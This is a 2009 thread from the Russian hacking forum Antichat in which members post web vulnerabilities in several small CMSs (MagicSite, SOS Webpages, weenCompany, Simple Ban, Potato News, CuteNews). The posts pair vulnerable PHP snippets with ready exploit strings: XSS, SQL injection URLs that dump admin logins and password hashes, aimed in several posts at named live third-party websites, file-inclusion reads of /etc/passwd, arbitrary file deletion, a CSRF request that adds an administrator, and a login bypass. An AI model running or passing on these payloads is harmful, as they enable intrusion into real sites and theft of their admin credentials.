HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.05.2009, 17:17
bug1z
Познающий
Регистрация: 07.05.2009
Сообщений: 64
Провел на форуме:
418218

Репутация: 59
По умолчанию

MagicSite CMS XSS

В строке поиска <script>alert('Antichat')</script>
Код:
http://www.magicsite.ru/search.php?sword=%3Cscript%3Ealert%28%27Antichat%27%29%3C%2Fscript%3E&x=0&y=0
Одним запросом и XSS и раскрытие путей и скуль инжект не далеке
На сервере у них magic_quotes=ON, так как даные слешируются!
Код:
http://www.magicsite.ru/search.php?sword=1'
Вы искали: "1\'"
Не далеко и скуль инжект!
Админка: http://www.magicsite.ru/admin/

Но вход разршон с браузера Microsoft Internet Explorer версии 5.5 и выше!

P.S.: Её продают за 24 505,00 р. =//

Последний раз редактировалось bug1z; 15.05.2009 в 17:22..
 
Ответить с цитированием

  #2  
Старый 15.05.2009, 17:54
bug1z
Познающий
Регистрация: 07.05.2009
Сообщений: 64
Провел на форуме:
418218

Репутация: 59
По умолчанию

skillz CMS XSS
В поле Поиск по сайту:
"><script>alert(111)</script>
Код:
http://www.skillz.ru/index.php?search=%22%3E%3Cscript%3Ealert%28111%29%3C%2Fscript%3E&m=search
 
Ответить с цитированием

SOS Webpages
  #3  
Старый 16.05.2009, 15:44
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию SOS Webpages

SOS Webpages
Сайт: http://www.soswebpages.com/
Табличка с логинами\хешами админов: hw_admin
Дефолтовый префикс: sos_


SQL-injection

Уязвимый код:
photo.php
PHP код:
 . . .
 if (isset(
$_GET['photo_id'])) {
    
  
$photo_id mysql_real_escape_string($_GET['photo_id']);
  
$sql "SELECT * FROM " $dbprefix "photos WHERE photo_id=$photo_id";
  
$result=mysql_query($sql);  
 . . . 
Классный код )) Зачем спрашивается юзать mysql_real_escape_string() и при этом не обрамлять параметр кавычками в запросе
Аналогично с переменной event_id в этом же скрипте

PHP код:
 . . .
elseif (isset(
$_GET['event_id'])) {
  
  
$event_id mysql_real_escape_string($_GET['event_id']); 
    . . .
    
$sql "SELECT * FROM " $dbprefix "events WHERE event_id=$event_id";
  
$result=mysql_query($sql);
 . . . 
Эксплуатация:
Цитата:
site.com/index.php?pages_id=1&photo_id=-1+union+select+1,2,3,concat_ws(0x2F,admin_user,adm in_password),5,6+from+sos_hw_admin
Пример:
Цитата:
http://www.temoinsdelamisericorde.fr/index.php?pages_id=38&photo_id=-1+union+select+1,2,3,concat_ws(0x2F,admin_user,adm in_password),5,6+from+sos_hw_admin&p=0
 
Ответить с цитированием

  #4  
Старый 09.09.2009, 16:26
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

Цитата:
Сообщение от ElteRUS  
SOS Webpages
Сайт: http://www.soswebpages.com/
Табличка с логинами\хешами админов: hw_admin
Дефолтовый префикс: sos_


SQL-injection

Уязвимый код:
photo.php
PHP код:
 . . .
 if (isset(
$_GET['photo_id'])) {
    
  
$photo_id mysql_real_escape_string($_GET['photo_id']);
  
$sql "SELECT * FROM " $dbprefix "photos WHERE photo_id=$photo_id";
  
$result=mysql_query($sql);  
 . . . 
Классный код )) Зачем спрашивается юзать mysql_real_escape_string() и при этом не обрамлять параметр кавычками в запросе
Аналогично с переменной event_id в этом же скрипте

PHP код:
 . . .
elseif (isset(
$_GET['event_id'])) {
  
  
$event_id mysql_real_escape_string($_GET['event_id']); 
    . . .
    
$sql "SELECT * FROM " $dbprefix "events WHERE event_id=$event_id";
  
$result=mysql_query($sql);
 . . . 
забавный код в файле admin_delete_image.php

PHP код:
/*    admin_delete_image.php will delete an image from the server */

Require "passcheck.php";
$image=$_GET["image"];
if (
file_exists("../uploads/$image")) {
    
unlink("../uploads/$image");
    }
header("Location: admin_view_images.php");
exit;
?> 
имея права админа можно удалить любые файлы!!который имеют соответсвующие права

admin/admin_delete_image.php?image=../index.php%00 и у нас стерается наш index.php
 
Ответить с цитированием

  #5  
Старый 06.10.2009, 22:23
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

weenCompany
китайская цмс

Сайт:
http://www.weentech.com/
Дорк: "Created by weenCompany"

SQL-injection

Уязвимый код:

index.php
PHP код:
. . . 
if(
$article $DB->query_first("SELECT title, metakeywords, metadescription 
FROM " 
TABLE_PREFIX $_GET['moduleid']. " WHERE articleid = '" $_GET['articleid'] . "'"))
. . . 
Эксплуатация:

Цитата:
site.com/index.php?moduleid=m2_news[SQL-inj]&articleid=1
Примеры:

Цитата:
http://www.stone-business.com/index.php?moduleid=m2_news+where+articleid=-1+union+select+concat_ws(0x2F,username,password),2 ,3+from+cwsen_users--+&articleid=1
http://perrint.com/index.php?moduleid=m2_news+where+articleid=-1+union+select+concat_ws(0x2F,username,password),2 ,3+from+cwsen_users--+&articleid=1
Вывод в тайтле
 
Ответить с цитированием

  #6  
Старый 03.06.2009, 09:55
Iceangel_
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

Цитата:
Сообщение от bug1z  
skillz CMS XSS
В поле Поиск по сайту:
"><script>alert(111)</script>
Код:
http://www.skillz.ru/index.php?search=%22%3E%3Cscript%3Ealert%28111%29%3C%2Fscript%3E&m=search
LFI(требования: register_globals=on)
/forums/profile.php

Переменая $phpEx, судя по коду, должна была определятся в extension.inc, но разработчик по невнимательности, не включил в файл в дистрибутив, вследствии имеем возможность определить переменную и получить локальный инклуд
уязвимый код:
PHP код:
define('IN_PHPBB'true);
$phpbb_root_path './';
include(
$phpbb_root_path 'extension.inc');
include(
$phpbb_root_path 'common.'.$phpEx); 
эксплуатирование:
Код:
/forums/profile.php?phpEx=../../../../../../../../../../../etc/passwd

(с) Iceangel_
 
Ответить с цитированием

  #7  
Старый 21.05.2009, 20:45
[underwater]
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме:
2185909

Репутация: 308
По умолчанию

Cifshanghai Script

Download: http://www.cifshanghai.com/
Vuln File: new.php
Exploit:
Код:
http://localhost/[path]/new.php?id=[SQL]
POC:
Цитата:
http://www.vennas.com/new.php?id=-1%20union%20select%201,2,3,4,group_concat(name,0x3 a,password)%20from%20fk_admin--
http://www.nicefurniture.com.cn/new.php?id=-20%20union%20select%201,2,3,4,5,6,group_concat(nam e,0x3a,password),8%20from%20fk_admin-
 
Ответить с цитированием

  #8  
Старый 26.05.2009, 17:16
[underwater]
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме:
2185909

Репутация: 308
По умолчанию

CuteNews
CSRF:

Код:
http://localhost/cutenews/index.php

POST /cutenews/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://localhost/cutenews/index.php?mod=editusers&action=list
Cookie: lastusername=underwater; username=underwater; md5_password=xxx;
Content-Type: application/x-www-form-urlencoded
Content-Length: 128
regusername=underwater&regpassword=_123456&regnickname=underwater&regemail=underwater%40gmail.com&reglevel=1&action=adduser&mod=editusers

Код:
http://localhost/cutenews/index.php?regusername=underwater&regpassword=_123456&regnickname=underwater&regemail=underwater%40gmail.com&reglevel=1&action=adduser&mod=editusers
Цитата:
Пользователь Добавлен

Пользователь underwater был успешно добавлен в качестве администратора

вернуться
Про шелл уже не стал писать:=\
 
Ответить с цитированием

  #9  
Старый 03.06.2009, 09:42
Iceangel_
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

Уязвимости Simple Ban
download: http://boedesign.com/downloads/simpleban_v1.5.zip

Blind SQL-injection(требования: magic_quotes=off)
updatenote.php

уязвимый код:
PHP код:
$id $_GET["fieldname"];
$note $_GET["content"];
mysql_query("UPDATE notes SET note='$note' WHERE id='$id'") or die ("I could not insert"); 
эксплуатирование:
Код:
updatenote.php?content=9999'+or+if(ascii(substring((select+concat_ws(0x3a,user,pass)+from+admin),1,1))>1,BENCHMARK(2000000,md5(current_date)),2)--+
в случае истинности условия получаем небольшую задержку




bypass(требования: magic_quotes=off)
login.php
уязвимый код:
PHP код:
$user $_POST['user'];
$pass $_POST['pass'];

if(
$_POST['login']){
    
// QUERY ADMIN DATABASE
    
$getlogin "SELECT * FROM admin WHERE user='$user' and pass='$pass'";
    
$getlogin2 mysql_query($getlogin); 
эксплуатирование:
логинимся с именем:
' or 1=1--



(с) Iceangel_

Последний раз редактировалось Iceangel_; 03.06.2009 в 09:47..
 
Ответить с цитированием

Уязвимости Potato News 1.0.2
  #10  
Старый 03.06.2009, 16:20
Iceangel_
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию Уязвимости Potato News 1.0.2

Уязвимости Potato News 1.0.2
download: http://potato-news.googlecode.com/files/potatonews-1.0.2.zip

LFI
(требования: register_globals=on)

/timeago.php
уязвимый код:
PHP код:
if (file_exists("data/comments/$nid.ip.php")) {
include(
"data/comments/$nid.ip.php"); 
эксплуатирование:
Код:
/timeago.php?nid=../../../../../../../../../../../../etc/passwd

(с) Iceangel_
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ